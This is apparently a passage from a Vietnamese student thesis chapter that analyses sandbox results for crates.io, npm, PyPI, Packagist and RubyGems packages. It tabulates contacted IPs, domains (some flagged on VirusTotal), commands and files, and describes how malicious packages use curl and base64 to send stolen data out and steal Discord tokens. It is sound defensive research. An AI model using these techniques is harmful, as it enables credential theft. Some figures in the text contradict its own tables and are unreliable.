
\chapter{Phân tích và Khai phá dữ liệu}
\label{chap:findings}
Trong chương này, nhóm em tập trung vào phân tích các đặc tính cơ bản của các gói phần mềm đã được phân tích bởi công cụ \textit{package-analysis}. Dữ liệu chính trong các phân tích dưới đây được lấy từ tập dataset \textit{ossf-malware-analysis} trên Google BigQuery~\cite{bigquery-package-analysis}. Bảng~\ref{tab:ecosystems-info} liệt kê các kho phần mềm phổ biến, và được nghiên cứu trong luận văn của nhóm em. Nguồn dữ liệu mà nhóm em nghiên cứu chứa các gói của các kho lưu trữ phần mềm phổ biến bao gồm crates.io, npm, PyPI, Packagist, RubyGems. 

% Please add the following required packages to your document preamble:
% \usepackage[table,xcdraw]{xcolor}
% Beamer presentation requires \usepackage{colortbl} instead of \usepackage[table,xcdraw]{xcolor}
\begin{table}[]
\centering
\resizebox{\textwidth}{!}{
\rowcolors{2}{lightbrown}{white}
\begin{tabular}{lllll}
\hline
\textbf{Kho phần mềm}                     & \textbf{Ngôn ngữ }                   & \textbf{Số lượng gói trong kho} & \begin{tabular}[c]{@{}l@{}}\textbf{Số lượng gói được phân tích} \\ \textbf{bởi package-analysis}\end{tabular}  & \begin{tabular}[c]{@{}l@{}} \textbf{Tỉ lệ số lượng gói được phân tích} \\ \textbf{bởi package-analysis}\end{tabular}\\ \hline
{\color[HTML]{343434} crates.io} & {\color[HTML]{343434} Rust} &           144,047             &       125,640  & 87.22\%                                                                                    \\ \hline
npm                              & Javascript                  &     4,530,434                   &       1,264,900        & 27.92\%                                                                             \\ \hline
Packagist                        & PHP                         &          390,942              &       63,987     & 16.37\%                                                                                  \\ \hline
PyPI                             & Python                      &     535,457                 &       287,299    & 53.65\%                                                                                 \\ \hline
RubyGems                         & Ruby                        &                 197,071       &        31,803    & 16.14\%                                                                                \\ \hline
\end{tabular}
}
\caption{Các kho mã nguồn ở phổ biến}
\label{tab:ecosystems-info}
\end{table}

\section{Tổng quan về các kho mã nguồn mở}

Bảng~\ref{tab:ecosystems-info} cho chúng ta thấy số lượng các phân tích cho các gói phần mềm trên npm chiếm đa số trong tập dataset. Thứ hai là PyPI với số lượng là hai triệu gói. Số lượng phân tích của các gói trong các kho crates.io, Packagist, và Rubygems là tương đương đối thấp như nhau. Tỉ lệ số lượng các gói trong crates.io được công cụ \textit{package-analysis } phân tích là cao nhất với 87.2\%. Trái ngược với crates.io, tỉ lệ các gói được phân tích của Packagist là thấp nhất với chỉ 16.37\%. Mặc dù npm có số lượng gói phần mềm trong kho chiếm số lượng lớn nhất, nhưng chỉ có 28\% số lượng gói trong kho này được phân tích bởi công cụ \textit{package-analysis}.
 

\begin{figure}
    \centering
    \includegraphics[width=0.75\linewidth]{images/Analysis completion rate at the import phase and install phase.png}
    \caption{Tỉ lệ phân tích thành công các gói mã nguồn của \textit{package-analysis} tại thời điểm cài đặt và import mã nguồn.}
    \label{fig:Analysis completion rate at the import phase and install phase}
\end{figure}




Biểu đồ \ref{fig:Analysis completion rate at the import phase and install phase} thể hiện tỉ lệ phân tích thành công các gói phần mềm của \textit{package-analysis} ở giai đoạn cài đặt (install) và import. Trung bình các gói phần mềm trên tất cả các kho có tỉ lệ thành công ở giai đoạn cài đặt và import lần lượt là (62.75\%) và 95.81\%.

Các gói phần mềm npm có tỉ lệ thành công cao nhất trong giai đoạn cài đặt (90\%), và đứng thứ hai trong giai đoạn import. Trong khi đó, các gói trên crates.io mặc dù có tỉ lệ thành công ở giai đoạn import cao nhất (100\%), nhưng lại có tỉ lệ thành công ở giai đoạn cài đặt thấp nhất (dưới 50\%). Điều này cho thấy việc cài đặt các gói phần mềm Rust trong kho lưu trữ crates.io trên môi trường sandbox còn gặp nhiều thách thức.





% ##########################################

\section{Phân tích các kết nối mạng tạo bởi các gói phần mềm}

Trong phần này, nhóm em tập trung vào phân tích các địa chỉ IP và các tên miền (domains) mà các gói phần mềm liên hệ tới trong quá trình thực thi trong môi trường sandbox của package-analysis. 

\subsection{Phân tích các địa chỉ IP được các gói phần mềm kết nối tới}
Bảng~\ref{tab:top-10-ip} liệt kê 10 địa chỉ IP được kết nối tới nhiều nhất bởi các gói phần mềm của từng kho mã nguồn mở tại thời điểm import. Bảng này cho ta thấy tại thời điểm import có nhiều kết nối tới địa chỉ loopback (::1, 127.0.0.1), cũng như kết nối tới địa chỉ máy chủ DNS của Google (8.8.8.8). 

\begin{table}[]
\centering
\rowcolors{2}{lightbrown}{white}
\resizebox{\textwidth}{!}{
\begin{tabular}{llllll}
\hline
\textbf{Top} & \textbf{crates.io} & \textbf{npm}          & \textbf{Packagist}       & \textbf{PyPI}          & \textbf{RubyGems}      \\ \hline
1   &           & 8.8.8.8      & 8.8.8.8         & ::1           & 127.0.0.1     \\ \hline
2   &           & 127.0.0.1    & ::1             & 192.168.0.10  & ::1           \\ \hline
3   &           & 10.68.0.10   & 127.0.0.1       & 8.8.8.8       &  8.8.8.8            \\ \hline
4   &           & \textbf{54.208.186.182} & \textbf{185.199.108.133} & 37.19.207.34  & \textbf{::ffff:7f00:1}      \\ \hline
5   &           & 54.224.34.30 & 185.199.110.133 & 23.203.40.249  & \textbf{3.248.33.252}  \\ \hline
6   &           & \textbf{34.201.81.34} & 185.199.111.133  & 23.56.220.29  & 54.77.139.23  \\ \hline
7   &           & \textbf{54.243.129.215} & \textbf{185.199.109.133} & 127.0.0.1     & 146.107.217.142 \\ \hline
8   &           & ::1          & 142.44.245.229 & \textbf{151.101.0.223}  & 2606:4700::6810:b60f  \\ \hline
9   &           & \textbf{216.24.57.3} & 2606:50c0:8003::154 & \textbf{151.101.64.223} & 2606:4700::6810:b50f  \\ \hline
10  &           & 216.24.57.253 & 2606:50c0:8002::154 & 151.101.192.223  & 169.254.169.254              \\ \hline
\end{tabular}
}
\caption{Mười địa chỉ IP được kết nối tới nhiều nhất tại thời điểm import}{\footnotesize Các ô được tô đậm là những địa chỉ IP bị dán nhãn độc hại hoặc nghi ngờ bởi ít nhất một hãng bảo mật trên VirusTotal.}
\label{tab:top-10-ip}
\end{table}

Bảng~\ref{tab:top-10-ip-install} hiển thị 10 địa chỉ IP các gói phần mềm kết nối tới nhiều nhất tại thời điểm cài đặt. Ngoài các địa chỉ cục bộ (loopback) cũng như địa chỉ máy chủ DNS của Google, nhóm chúng em nhận thấy một số địa chỉ IP đáng ngờ nên tiến hành phân tích sâu hơn. Cụ thể, nhóm em thực hiện quét (scan) các địa chỉ IP bằng công cụ VirusTotal~\cite{virustotal}. VirusTotal là một công cụ cho phép người dùng kiểm tra các tệp tin, địa chỉ IP, hoặc tên miền có độc hại hay không. Các mẫu đáng ngờ được quét bởi các phần mềm phát hiện mã độc liên kết với VirusTotal. 

\begin{table}[]
\centering
\rowcolors{2}{lightbrown}{white}
\resizebox{\textwidth}{!}{
\begin{tabular}{llllll}
\hline
\textbf{Top} & \textbf{crates.io}    & \textbf{npm}          & \textbf{Packagist}    & \textbf{PyPI}         & \textbf{RubyGems}     \\ \hline
1   & 8.8.8.8      & 104.16.18.35&167.114.128.168 & ::1          & 151.101.1.227 \\ \hline
2   & 2a04:4e42:600::649&104.16.16.35&8.8.8.8     & \textbf{151.101.128.223}   & 151.101.65.227  \\ \hline
3   & 2a04:4e42::649& 104.16.22.35&2607:5300:201:3100::54c6&2a04:4e42::223 & 151.101.193.227 \\ \hline
4   & 2a04:4e42:400::649&104.16.24.35&142.44.164.249&2a04:4e42:200::223 & 151.101.129.227 \\ \hline
5   & 2a04:4e42:200::649&104.16.23.35&142.44.164.255&151.101.64.223& 2a04:4e42:200::483\\ \hline
6   & \textbf{151.101.66.137}&104.16.26.35& 2607:5300:201:2100::7:2274&2a04:4e42:600::223& 2a04:4e42:600::483 \\ \hline
7   & \textbf{151.101.194.137}&104.16.20.35& 2607:5300:201:2100::7:2273&\textbf{151.101.192.223}& 2a04:4e42:400::483   \\ \hline
8   &  \textbf{151.101.2.137}&104.16.27.35&  140.82.112.9  & 2a04:4e42:400::223&  2a04:4e42::483  \\ \hline
9   & \textbf{151.101.130.137}&104.16.17.35&  140.82.114.10 & 151.101.0.223 &   8.8.8.8           \\ \hline
10  & 99.84.160.86 &104.16.25.35 &  140.82.112.10 &8.8.8.8 &   10.68.0.10 \\ \hline
\end{tabular}
}
\caption{Mười địa chỉ IP được các gói mã nguồn mở kết nối tới nhiều nhất tại thời điểm cài đặt.}
\label{tab:top-10-ip-install}
\end{table}

Bảng~\ref{tab:top-10-ip-install} cho ta thấy trong 10 địa chỉ IP hàng đầu trong kho lưu trữ phần mềm mã nguồn mở PyPI tại thời điểm cài đặt, địa chỉ IP 151.101.64.223, 151.101.0.223, và 185.199.108.133 là có nghi vấn độc hại. Sử dụng chương trình \textit{whois} thì thấy hai địa chỉ IP này được sở hữu bởi tổ chức Fastly (công ty cung cấp dịch vụ điện toán đám mây) và khi kiểm tra trên trang ViusTotal thì thấy các địa chỉ IP này được cộng đồng đánh giá là độc hại. Cụ thể, hai địa chỉ IP  bị dán nhãn độc hại bởi Xcitium Verdict Cloud và bị dán nhãn đáng ngờ bởi Gridinsoft, trong khi địa chỉ IP thứ 3 bị gán nhãn độc hại bởi CyRadar và Xcitium Verdict Cloud.

Tiếp theo, nhóm em tiến hành quét tất cả các địa chỉ IP với VirusTotal. Với tổng cộng 37,423 địa chỉ IP được quét trên VirusTotal. Hình~\ref{fig:number-security-vendor-flagged-ip} cho biết số lượng công cụ quét địa chỉ IP(security vendors) trên VirusTotal đánh dấu các địa chỉ IP (các địa chỉ IP được các gói phần mềm trong dữ liệu phân tích kết nối tới). Hình~\ref{fig:number-security-vendor-flagged-ip} cho thấy hầu hết các địa chỉ IP bị đánh dấu bởi một công cụ quét IP. Có ít nhất 1,417 các địa chỉ IP bị đánh dấu bởi ít nhất hai công cụ quét địa chỉ IP trên VirusTotal. Số lượng công cụ quét địa chỉ IP đánh dấu địa chỉ IP càng nhiều thì địa chỉ IP đó có khả năng cao là liên quan tới hành vi độc hại.

Biểu đồ~\ref{fig:all-ip-location-country} cho thấy hầu hết địa chỉ IP có vị trí tại quốc gia Hoa Kỳ, đứng thứ hai là quốc gia Ấn Độ, tiếp theo đó là Brazil và Trung Quốc. Ngoài ra, biểu đồ~\ref{fig:malicious-ip-location-country} và biểu đồ~\ref{fig:benign-ip-location-country} cũng cho thấy các quốc gia Đức hay Brazil được các gói độc hại kết nối tới, có khả năng các máy chủ được kiểm soát bởi kẻ tấn công nằm tại Châu Âu hay Nam Mỹ. Tuy nhiên nhưng kẻ tấn công có thể dùng các mạng riêng ảo VPNs (Virtual Private Networks) hay các máy chủ proxy để giấu đi vị trí thực sự của mình, nên vị trí các quốc gia này cũng có thể là vị trí các máy chủ VPN mà kẻ tấn công sử dụng.



\begin{figure}
    \centering
    \includegraphics[width=0.9\linewidth]{images/number-security-vendors-flagged-ip.png}
    \caption{Số lượng các công cụ quét mã độc đánh dấu các địa chỉ IP trong VirusTotal}
    \label{fig:number-security-vendor-flagged-ip}
\end{figure}

\begin{figure}[t!]
    \centering
    \includegraphics[width=0.6\linewidth]{images/all_ip_location_country.png}
    \caption{Biểu đồ địa chỉ IP theo quốc gia của các gói lành tính và độc hại}
    \label{fig:all-ip-location-country}
\end{figure}

\begin{figure}[t!]
    \centering
    \includegraphics[width=0.6\linewidth]{images/malicious_ip_location_by_country.png}
    \caption{Biểu đồ địa chỉ IP theo quốc gia các gói độc hại}
    \label{fig:malicious-ip-location-country}
\end{figure}

\begin{figure}[t!]
    \centering
    \includegraphics[width=0.6\linewidth]{images/benign-ip-location-country.png}
    \caption{Biểu đồ địa chỉ IP theo quốc gia các gói lành tính}
    \label{fig:benign-ip-location-country}
\end{figure}






\begin{figure}
    \centering
    \includegraphics[width=0.75\linewidth]{images/count _flageged_ip_package.png}
    \caption{Số lượng các gói có ít nhất một địa chỉ IP bị dán nhãn là độc hại}
    \label{fig:flag-ip-package}
\end{figure}



Biểu đồ~\ref{fig:flag-ip-package} cho thấy số lượng các gói phần mềm kết nối ít nhất đến một địa chỉ IP bị đánh dấu là độc hại bởi các công cụ quét địa chỉ IP trong VirusTotal. Nhận thấy số lượng npm và PyPI chiếm số lượng nhiều nhất, điều này cho thấy kẻ tấn công chủ yếu tấn công vào hai kho lưu trữ lớn và phổ biến nhất là npm và PyPI.

\begin{table}[]
\centering
\rotatebox{90}{
\begin{adjustbox}{width=1.3\textwidth,totalheight=\textheight,keepaspectratio}
\rowcolors{2}{lightbrown}{white}
\begin{tabular}{llllll}
\hline
\textbf{Top} & \textbf{crates.io }   & \textbf{npm}          & \textbf{Packagist}    & \textbf{PyPI}         & \textbf{RubyGems}     \\ \hline
1   & crates.io     & registry.npmjs.org & repo.packagist.org & pypi.org          & index.rubygems.org \\ \hline
2   & \textbf{static.crates.io }& \textbf{objects.githubusercontent.com} & packagist.org & files.pythonhosted.org & \textbf{rubygems.org}  \\ \hline
3   & index.crates.io & storage.googleapis.com & codeload.github.com & raw.githubusercontent.com & \textbf{objects.githubusercontent.com} \\ \hline
4   & github.com & github.com & api.github.com & googlechromelabs.github.io & raw.githubusercontent.com \\ \hline
5   & api.github.com & nodejs.org & bitbucket.org & storage.googleapis.com & \textbf{appsignal-agent-releases.global.ssl.fastly.net}\\ \hline
6   & \textbf{objects.githubusercontent.com} &opencollective.com& \textbf{gitlab.com} & github.com & github.com \\ \hline
7   & storage.googleapis.com & binaries.prisma.sh & gitee.com & download.joulescope.com & repo.maven.apache.org   \\ \hline
8   &  pypi.org&codeload.github.com& downloads.wordpress.org & \textbf{objects.githubusercontent.com} &  s3.amazonaws.com\\ \hline
9   & files.pythonhosted.org & \textbf{edgedl.me.gvt1.com} & git.drupalcode.org & \textbf{pypi.python.org} &   \textbf{appsignal-agent-releases.s3-eu-west-1.amazonaws.com}          \\ \hline
10  & download.pytorch.org &raw.githubusercontent.com &  gitlab.wpdesk.dev & registry.npmjs.org &   agent-binaries.cloud.solarwinds.com \\ \hline
\end{tabular}
\end{adjustbox}
}
\caption{Mười tên miền (domains) được các gói mã nguồn mở kết nối tới nhiều nhất tại thời điểm cài đặt.}
\label{tab:top-10-domains-install}
\end{table}

Khi nhìn vào Bảng~\ref{tab:top-10-domains-import} nhóm em nhận thấy các gói crates.io không kết nối đến tên miền nào. Ngoài ra tên miền \url{eommih12qna182o.m.pipedream.net} và \url{eoaptq5t02z6dxu.m.pipedream.net} lần lượt bị đánh dấu là độc hại trên VirusTotal. Cụ thể, tên miền \url{eommih12qna182o.m.pipedream.net} bị đánh dấu là lừa đảo (phishing) bởi  Emsisoft và độc hại bởi Netcraft. Tên miền \url{eoaptq5t02z6dxu.m.pipedream.net} bị đánh dấu là lừa đảo (phishing)  bởi Yandex Safebrowsing. 

\begin{table}[]
\centering
\rotatebox{90}{
\begin{adjustbox}{width=1.3\textwidth,totalheight=\textheight,keepaspectratio}
\rowcolors{2}{lightbrown}{white}
\begin{tabular}{llllll}
\hline
\textbf{Top} & \textbf{crates.io}    & \textbf{npm}          & \textbf{Packagist}    & \textbf{PyPI}         & \textbf{RubyGems}     \\ \hline
1   & & registry.npmjs.org & raw.githubusercontent.com & pypi.org & s3.amazonaws.com\\ \hline
2   & & api.knapsack.cloud & imagex.volcengineapi.com & raw.githubusercontent.com & matrix.org \\ \hline
3   & & checkpoint-api.hashicorp.com & www.googleapis.com & www.apple.com & matrix-client.matrix.org\\ \hline
4   & & eth-mainnet.g.alchemy.com & registry.npmjs.org & files.pythonhosted.org & \textbf{eommih12qna182o.m.pipedream.net} \\ \hline
5   & & registry.npmjs.com & discord.com & scinary.com & \textbf{eoaptq5t02z6dxu.m.pipedream.net}\\ \hline
6   & & rpc.ankr.com & ad.oceanengine.com & storage.googleapis.com & api.digitalocean.com \\ \hline
7   & & eth-goerli.g.alchemy.com & gateway.discord.gg & www.google-analytics.com & github.com  \\ \hline
8   & & registry.yarnpkg.com & composer.github.io & registry.npmjs.org &  mips.helmholtz-muenchen.de\\ \hline
9   & & raw.githubusercontent.com & www.alura.com.br & \textbf{huggingface.co} &  eoy38idg1hk4nep.m.pipedream.net    \\ \hline
10  & & goerli-rollup.arbitrum.io & releases.jquery.com & \textbf{allen-brain-cell-atlas.s3.us-west-2.amazonaws.com} &   eo12kxtvatnejre.m.pipedream.net \\ \hline
\end{tabular}
\end{adjustbox}
}
\caption{Mười tên miền (domains) được các gói mã nguồn mở kết nối tới nhiều nhất tại thời điểm import.}
\label{tab:top-10-domains-import}
\end{table} 



\subsection{Phân tích các tên miền (domains) được các gói kết nối tới}.

Các gói phần mềm độc hại thường giao tiếp với các máy chủ, được điều khiển bởi kẻ tấn công, để nhận lệnh cũng như gửi thông tin đánh cắp. Vì vậy, trong phần này nhóm em phân tích các tên miền mà các gói phần mềm trong các kho kết nối tới, để nhận dạng bất cứ tên miền đáng ngờ nào.

Bảng~\ref{tab:top-10-domains-install} hiển thị các tên miền các gói phần mềm thường giao tiếp. Một số tên miền phổ biến thường được kết nối tới như \url{pypi.org}, đây là trang chủ của ngôn ngữ Python, nên không có điều gì đáng ngờ. Tương tự là tên miền \url{rubygems.org}, trang chính của kho RubyGems. Qua kiểm tra với công cụ VirusTotal, nhóm em không nhận thấy bất cứ tên miền độc hại nào trong danh sách 10 tên miền ở Bảng~\ref{tab:top-10-domains-install}.

Tuy nhiên, khi nhìn vào Bảng~\ref{tab:top-10-domains-install}, nhóm em nhận diện được hai tên miền \url{eommih12qna182o.m.pipedream.net} và \url{http://eoaptq5t02z6dxu.m.pipedream.net}  có nghi vấn độc hại. Qua kiểm tra với VirusTotal cho thấy tên miền \url{eommih12qna182o.m.pipedream.net} bị dán nhãn là lừa đảo (phishing) bởi Emsisoft và độc hại (malicious) bởi Netcraft.

Trong Bảng~\ref{tab:top-10-domains-install}, chúng ta có thể thấy tên miền \url{http://discord.com} được truy vấn nhiều thứ 5 tại thời điểm cài đặt gói (30 lần). \url{http://discord.com} là một nền tảng cho phép trò chuyện miễn phí cũng như trao đổi thông tin. Nền tảng này được sử dụng rộng rãi bởi nhiều cộng đồng khác nhau như trao đổi học tập, các game thủ. Kẻ tấn công thường nhắm đến nền tảng này nhằm đánh cắp thông tin chẳng hạn như các khóa API (Application Programming Interface) của người dùng. Một trong gói phần mềm chứa mã độc tấn công nền tảng này có thể kể đến là \textit{discordcmd} của PyPI. Gói mã nguồn độc hại này thực hiện tấn công người dùng sử dụng Discord trên hệ điều hành Windows. Để thực hiện tấn công, gói phần mềm này thực hiện truy cập đến tên miền \textit{raw.githubusercontent.com} để thực hiện tải mã độc backdoor lên máy tính nạn nhân, sau đó nó thực hiện tìm kiếm lấy các Discord token trong cơ sở dữ liệu của máy nạn nhân rồi gửi các thông tin này đến máy chủ discord được sở hữu bởi kẻ tấn công~\cite{package-analysis-case-studies}.

Khi nhìn vào Bảng~\ref{tab:top-10-domains-import} nhóm em nhận thấy các gói crates.io không kết nối đến tên miền nào. Ngoài ra tên miền \url{eommih12qna182o.m.pipedream.net}, \url{eoaptq5t02z6dxu.m.pipedream.net} lần lượt bị đánh dấu là độc hại trên VirusTotal. Cụ thể, tên miền \url{eommih12qna182o.m.pipedream.net} bị đánh dấu là phishing bởi  Emsisoft và độc hại bởi Netcraft. Tên miền \url{eoaptq5t02z6dxu.m.pipedream.net} bị đánh dấu là phishing  bởi Yandex Safebrowsing. 


\subsection{Phân tích các câu lệnh thực thi bởi các gói}

Các gói độc hại thường chạy các câu lệnh (commands) trên máy nạn nhân để thu thập thông tin, hoặc mã hóa các tệp tin hệ thống. Trong phân tích này, nhóm em tập trung vào phân tích các lệnh phổ biến được thực hiện bởi các gói phần mềm. Nhóm em chỉ phân tích các lệnh thực thi bởi các gói phần mềm. Các câu lệnh chạy bởi chính \textit{package-analysis} (ví dụ, các câu lệnh để chuẩn bị môi trường phân tích) sẽ không được phân tích. 

Các câu lệnh phổ biến thường liên quan tới quản lý phiên bản phần mềm (\textit{git}), thao tác trên thư mục (\textit{rm},\textit{ mv}), hay giải nén tập tin (\textit{tar}, \textit{gzip}). Tuy nhiên Bảng~\ref{tab:top-10-commands-install} cho ta thấy một số lệnh nhạy cảm như \textit{exec} (thực thi một lệnh nào đó trên hệ thống) hay \textit{sudo} (lệnh dùng để thực thi một lệnh nào đó dưới quyền root). 

Ngoài ra, Bảng~\ref{tab:top-10-commands-import} cho ta thấy xuất hiện các câu lệnh nhạy cảm như tải một tệp tin hay dữ liệu từ bên ngoài (\textit{curl}, \textit{wget}), lấy thông tin về tên của hệ thống (\textit{hostname}).

\begin{table}[htbp]
\centering
\setlength{\tabcolsep}{3pt} % Reduce the column separation
\rowcolors{2}{lightbrown}{white}
\begin{tabular}{llllll}
\toprule
\textbf{Top} & \textbf{crates.io}     & \textbf{npm}        & \textbf{Packagist}               & \textbf{PyPI}         & \textbf{RubyGems} \\ \hline
1   & cc            & sed        & rm                      & dpkg-query   & rake     \\ \hline
2   & /usr/bin/ld   & git        & /usr/bin/unzip          & as           & rm       \\ \hline
3   & as            & printf     & git                     & gcc          & fdb      \\ \hline
4   & rm            & rm         & grep                    & /usr/bin/ld  & expr     \\ \hline
5   & mv            & as         & stty                    & /bin/bash    & lefthook \\ \hline
6   & sed           & touch      & exec                    & rm           & sed      \\ \hline
7   & gcc           & mkdir      & fossil tag list         & clean        & tar      \\ \hline
8   & grep          & cc         & hg branch               & git          & gzip     \\ \hline
9   & touch         & make       & sudo                    & expr         & metanorma\\ \hline
10  & cmp           & basename   & lsmod \textbar{} grep vboxguest & pkg-config   & open     \\ \hline
\end{tabular}
\caption{Mười câu lệnh (commands) được các gói mã nguồn mở sử dụng nhiều nhất tại thời điểm cài đặt.}
\label{tab:top-10-commands-install}
\end{table}


\begin{table}
\centering
\rowcolors{2}{lightbrown}{white}
\begin{tabular}{llllll}
\hline
\textbf{Top} & \textbf{crates.io}    & \textbf{npm}          & \textbf{Packagist}    & \textbf{PyPI}         & \textbf{RubyGems}     \\ \hline
1   & cc           & git         &  git          & lscpu      & git    \\ \hline
2   & /usr/bin/cmake & getconf   & stty         & /sbin/ldconfig  & hostname \\ \hline
3   & as            & head       & grep        & git        & file  \\ \hline
4   & /usr/bin/c++  & cat        &  rm           & file       &bundler \\ \hline
5   & /usr/bin/ranlib & init      & /usr/bin/unzip & bash & which\\ \hline
6   & ar            &  dpkg-deb   & which       & wget        & sidekiq\\ \hline
7   & /usr/bin/git  & grep        & dirname       & head          & curl \\ \hline
8   & rm             &hostname    & awk            & dirname        & sqlite3\\ \hline
9   &curl           & locale      &  grep         & gcc         &  jets  \\ \hline
10  & sed            & rm        & sed          & grep      & locale  \\ \hline 
\end{tabular}
\caption{Mười câu lệnh (commands) được các gói mã nguồn mở sử dụng nhiều nhất tại thời điểm import.}
\label{tab:top-10-commands-import}
\end{table}

\subsection{Phân tích các files truy cập bởi các gói phần mềm}

Bảng~\ref{tab:top-10-filepaths} thể hiện các tệp tin được sử dụng nhiều nhất của các gói. Nhóm em nhận thấy tất cả các đường dẫn tệp tin này đều là những tệp tin bình thường được sử dụng thường xuyên trong quá trình cài đặt các gói phần mềm.

\begin{table}[]
\centering
\rowcolors{2}{lightbrown}{white}
\rotatebox{90}{%
\begin{adjustbox}{width=1.3\textwidth,totalheight=\textheight,keepaspectratio}%
\begin{tabular}{llllll}
\hline
\textbf{Top} & \textbf{crates.io}                                & \textbf{npm }                         & \textbf{Packagist}                       & \textbf{PyPI}                                    & \textbf{RubyGems}                    \\ \hline
1   & /usr/lib/python3.10/\_\_pycache\_\_/weakref.cpython-310.pyc & /proc/meminfo                 & /lib/x86\_64-linux-gnu/libgcc\_s.so.1    & /lib/x86\_64-linux-gnu/libc.so.6         & /proc/self/maps            \\ \hline
2   & /proc/self/maps                         & /dev/null                    & /usr/lib/ssl/openssl.cnf       & /etc/ld.so.cache                        & /dev/tty                   \\ \hline
3   & /dev/urandom                            & /etc/ld.so.cache             & /lib/x86\_64-linux-gnu/libc.so.6         & /dev/tty                                & /lib/x86\_64-linux-gnu/libz.so.1 \\ \hline
4   & /usr/lib/python3.10/encodings           & /lib/x86\_64-linux-gnu/libm.so.6 & /lib/x86\_64-linux-gnu/libtinfo.so.6    & /lib/x86\_64-linux-gnu/libz.so.1         & /lib/x86\_64-linux-gnu/libcrypt.so.1 \\ \hline
5   & /lib/x86\_64-linux-gnu/libgmp.so.10     & /sys/fs/cgroup/memory/memory.limit\_in\_bytes & /lib/x86\_64-linux-gnu/libm.so.6    & /usr/share/locale/locale.alias          & /lib/x86\_64-linux-gnu/libm.so.6 \\ \hline
6   & /usr/lib/libm.so.6                      & /lib/x86\_64-linux-gnu/libgcc\_s.so.1 & /lib/x86\_64-linux-gnu/libbz2.so.1.0   & /usr/local/bin/python3                  & /usr/local/lib/ruby/gems/3.0.0  \\ \hline
7   & /usr/lib/python3.10/selectors.py        & /usr/local/bin/package.json   & /etc/ld.so.cache                      & /usr/lib/x86\_64-linux-gnu/gconv/gconv-modules.cache & /etc/ld.so.cache            \\ \hline
8   & /usr/lib/python3.10/importlib/\_\_init\_\_.abi3.so & /lib/x86\_64-linux-gnu/libc.so.6 & /lib/x86\_64-linux-gnu/liblzma.so.5   & /usr/local/bin                         & /root/.gem                 \\ \hline
9   & /usr/lib/python3.10/\_\_pycache\_\_/threading.cpython-310.pyc & /dev/tty                      & /usr/local/bin                       & /usr/lib/locale/C.UTF-8/LC\_CTYPE       & /root                      \\ \hline
10  & /usr/lib/x86\_64-linux-gnu/gconv/gconv-modules.cache & /package.json                 & /etc/localtime                      & /etc/localtime                         & /etc/localtime             \\ \hline
\end{tabular}%
\end{adjustbox}%
}
\caption{Mười files được các gói mã nguồn mở kết nối tới nhiều nhất.}
\label{tab:top-10-filepaths}
\end{table}





\begin{table}
\centering
\begin{adjustbox}{width=1\textwidth,totalheight=\textheight,keepaspectratio}
\rowcolors{2}{lightbrown}{white}
\begin{tabular}{lllll}
\hline

\textbf{Câu lệnh}        &  \textbf{Số lần xuất hiện}   & \textbf{Mô tả } & \textbf{Hành vi độc hại}    \\ \hline
ls             & 87\,706    &  Liệt kê các tệp tin máy tính và thư mục    & Thu thập thông tin        \\ \hline
bash            & 87\,656   &  Mở một shell bash mới & Thực thi lệnh           \\ \hline
cat             & 87\,500   &  Xem nội dung một tệp tin     & Thu thập thông tin   \\ \hline
dpkg-query      & 82\,758   &  Xem các thông tin của gói được liệt kê trong cơ sở dữ liệu dpkg & Thu thập dữ liệu       \\ \hline
lsb\_release -a  & 82\,758  & Lấy các thông tin về bản phân phối Linux  & Thu thập thông tin          \\ \hline
base64          & 78\,146   & Mã hóa và giải mã dữ liệu   & Giấu dữ liệu       \\ \hline
/usr/bin/curl   & 77\,026   & Truyền dữ liệu sử dụng đa dạng các phương thức mạng   & Đánh cắp, xuất dữ liệu trái phép           \\ \hline
which           & 68\,900   & Xác định vị trí thư mục các tệp tin thực thi   & Thu thập thông tin          \\ \hline
which bash      & 68\,652   &  Xác định vị trí thư mục tệp tin bash  & Thu thập thông tin          \\ \hline
tr              & 64\,524   &  Chuyển đổi hay xóa các kí tự & Giấu dữ liệu           \\  \hline
\hline
\end{tabular}
\end{adjustbox}
\caption{Các câu lệnh được sử dụng nhiều nhất trong tập dữ liệu của nhóm.}
\label{tab:malicious-package-commands}
\end{table}




\section{Phân tích hành vi của các gói phần mềm mã nguồn mở độc hại và lành tính}



Trong phần này, nhóm em tiến hành phân tích các hành vi phổ biến của các gói phần mềm độc hại và lành. Các phân tích được thực hiện dựa trên tập dữ liệu được nhóm em thu thập trong phần~\ref{sec:data-collection}.

\subsection{Phân tích các câu lệnh}

Bảng~\ref{tab:malicious-indicators-frequency} mô tả số lần xuất hiện của các câu lệnh, các địa chỉ IP và các tên miền (URLs) trong tập dữ liệu lành tính, độc hại và cả hai tập. Nhóm em quan sát thấy các gói độc hại thực hiện tổng số lượng các câu lệnh nhiều gấp đôi so với số lượng các câu lệnh thực hiện trong các gói lành tính. Tuy nhiên, các gói độc hại sử dụng nhiều các câu lệnh trùng lặp, điều này cho thấy những đoạn chương trình mã nguồn của các gói độc hại được sử dụng lại nhiều lần giữa các gói khác nhau.

Bảng~\ref{tab:malicious-package-commands} cho thấy top mười các câu lệnh được sử dụng bởi các gói độc hại trong tập dữ liệu mà nhóm thu thập. Nhóm em quan sát thấy hầu hết các câu lệnh liên quan đến hành vi thu thập thông tin. Ngoài ra, nhóm em nhận thấy các gói độc hại sử dụng các kỹ thuật phổ biến và đơn giản để thực hiện các hành vi độc hại, ví dụ các gói độc hại sử dụng \textit{base64} để thực hiện mã hóa dữ liệu, hoặc sử dụng lệnh \textit{curl} để phát tán dữ liệu thu thập trên máy nạn nhân ra bên ngoài.

So với các loại mã độc truyền thống trong hệ điều hành Windows hay Linux, các gói phần mềm độc hại trong các kho lưu trữ phần mềm thường sử dụng các kỹ thuật đơn giản hơn. Một vài kỹ thuật của các gói phần mềm độc hại đã được thống kê lại thành các mô hình hoặc phương pháp POC (Proof-of-Concepts), ví dụ nhóm tác giả Guo và các đồng nghiệp~\cite{guo2023empirical} đã thống kê thành năm loại kỹ thuật mà các gói phần mềm độc hại trong PyPI sử dụng bao gồm:

\begin{itemize}
    \item Điều khiển máy nạn nhân từ xa: ví dụ cài đặt backdoor, reverse shell.
    \item Đánh cắp thông tin: sau khi các gói phần mềm lấy cắp các thông tin nhạy cảm như \ac{API} sau đó mã hóa bằng \textit{base64} rồi gửi đến máy chủ kiểm soát bởi kẻ tấn công.
    \item Thực thi đoạn mã (code): Các đoạn chương trình mã code độc hại ở dạng bị mã hóa hay làm rối. Các đoạn mã này có thể nằm trong chương trình hay tải từ các máy chủ bên ngoài về. Sau đó kẻ tấn công giải mã các đoạn chương trình bị làm rối này và thực hiện biên dịch để thực hiện các hành vi độc hại.
